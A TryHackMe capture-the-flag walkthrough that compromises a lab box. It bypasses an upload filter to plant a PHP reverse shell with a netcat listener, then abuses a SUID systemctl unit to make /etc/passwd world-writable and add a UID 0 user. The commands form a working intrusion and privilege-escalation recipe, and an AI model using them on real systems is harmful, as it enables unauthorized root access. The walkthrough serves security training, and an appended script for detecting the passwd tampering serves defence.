Try Hack Me Vuln-university Write Up!

Let's start with a basic Nmap scan.

nmap -A -T4 -p- -sC <ip> -oN scan.nmap

[Screenshot: Nmap scan report]

Enumeration

Let’s begin with enumerating SMB shares.

[Screenshot: SMB shares]

So it looks like we are denied access! Never mind, we still have other ports to enumerate.

Let's move on to the web server, which is running on port 3333:

http://ip:3333/

Let's see if there are any hidden directories. You can choose any tool you like; here we use gobuster.

gobuster dir -u http://ip:3333/ -w /wordlists

  • -u specifies the target URL.
  • -w specifies the wordlist (provide the path to your own wordlist).

[Screenshot: gobuster report]

/internal looks interesting. Let's check it:

[Screenshot: /internal]

Now that we know we can upload a file, let's upload a reverse shell and try to connect back.

[Screenshot: Burp response]

Oops! Looks like it's blocking .php files.

Let's try to bypass the client-side filter by altering the extension. For example, you can try .php5, .php4 or .phtml, or a double extension such as .php.txt or .php.jpg.

[Screenshot: Burp response]

You can use netcat to set up a listener:

nc -nvlp <port>

Access the uploaded file from the browser and you should get a reverse shell.

[Screenshot: Reverse shell]

You can use the following command to upgrade the shell to a pty:

python -c 'import pty; pty.spawn("/bin/bash")'

For a more stable shell, execute the following commands (press Ctrl+Z to background the shell first, then run stty on your own terminal):

export TERM=xterm   # gives us access to terminal commands such as clear

stty raw -echo; fg   # turns off echo on our terminal, which gives us tab completion, arrow keys and Ctrl+C

You can grab the user flag here, but our intention is to root the box, so are you ready for some cool stuff? Let's privesc.

Privilege escalation

The instructions say there is a file with the SUID bit set that will allow us to escalate privileges.

The SUID bit is a permission set by the file's owner (here root) that lets any user run the program, but the program executes with the owner's privileges, i.e. as root.

We can use the find command to search for such files:

find / -perm -u=s -type f 2>/dev/null

Not every file with the SUID permission can be used to escalate privileges.

It looks like the systemctl binary can be used. But how do I know? There are some well-known lists you can check; GTFOBins is a good reference.

So how are we going to do this?

systemctl runs unit files, so if we manage to create one of our own and execute it, the command inside runs as root. Let's do this.

chmo=$(mktemp).service   # create a temporary unit file and keep its path in a variable

echo '[Service]
ExecStart=/bin/bash -c "chmod 777 /etc/passwd"
[Install]
WantedBy=multi-user.target' > $chmo   # the unit runs a command that makes /etc/passwd writable by everyone

./systemctl link $chmo   # link the unit file into systemd

./systemctl enable --now $chmo   # enable the unit and start it immediately

Now the permissions on /etc/passwd should be changed.

[Screenshot: Privesc]

You can use the following command to create a password hash:

openssl passwd -salt 123

Here we are using 123 as the salt.

After entering that you'll be prompted for a password; type it and the hash will be generated.

[Screenshot: passwd hash generation]

Now you can write the new user entry in /etc/passwd as:

new:hash:0:0:root:/root:/bin/bash

  • new: the name of the user
  • hash: the password hash generated above
  • 0:0: UID and GID of 0, i.e. root
  • root: the GECOS (comment) field
  • /root: the home directory
  • /bin/bash: the login shell
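From the defender's side, the tampering above leaves three clear traces: /etc/passwd becomes world-writable, a second UID 0 account appears, and a password hash sits in the passwd file instead of /etc/shadow. The following script is an added example (not part of the original write-up) that checks a passwd file's text for those signs; the sample file and the hash string in it are constructed.

```python
"""Audit /etc/passwd for the tampering pattern described in this write-up."""
import stat

# Constructed sample: normal entries plus an injected UID 0 account whose
# second field holds a hash (the hash value itself is a made-up placeholder).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bill:x:1000:1000:bill:/home/bill:/bin/bash
new:$1$123$abcdefghijklmnopqrstu.:0:0:root:/root:/bin/bash
"""

# Values in the password field that do NOT carry a usable hash:
# 'x' means "look in /etc/shadow", '*' and '!' mean the account is locked.
SAFE_PW_FIELDS = ("x", "*", "!")


def parse_passwd(text):
    """Return (name, password_field, uid) for every well-formed 7-field line."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than crash the audit
        try:
            uid = int(fields[2])
        except ValueError:
            continue
        entries.append((fields[0], fields[1], uid))
    return entries


def extra_root_accounts(text):
    """Names of UID 0 accounts other than root (the 'new' user from the write-up)."""
    return [name for name, _, uid in parse_passwd(text) if uid == 0 and name != "root"]


def inline_hash_accounts(text):
    """Accounts whose password field holds a hash (or is empty) instead of an 'x' pointer."""
    return [name for name, pw, _ in parse_passwd(text) if pw not in SAFE_PW_FIELDS]


def is_world_writable(mode):
    """True if an st_mode value (e.g. os.stat(path).st_mode) grants write to others."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    import os
    print("extra UID 0 accounts:", extra_root_accounts(SAMPLE_PASSWD))
    print("inline hashes:", inline_hash_accounts(SAMPLE_PASSWD))
    print("/etc/passwd world-writable:", is_world_writable(os.stat("/etc/passwd").st_mode))
```

To audit a live host, replace SAMPLE_PASSWD with the contents of /etc/passwd; any non-empty result from the first two checks, or True from the third, is worth an incident ticket.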

Help, learn, share.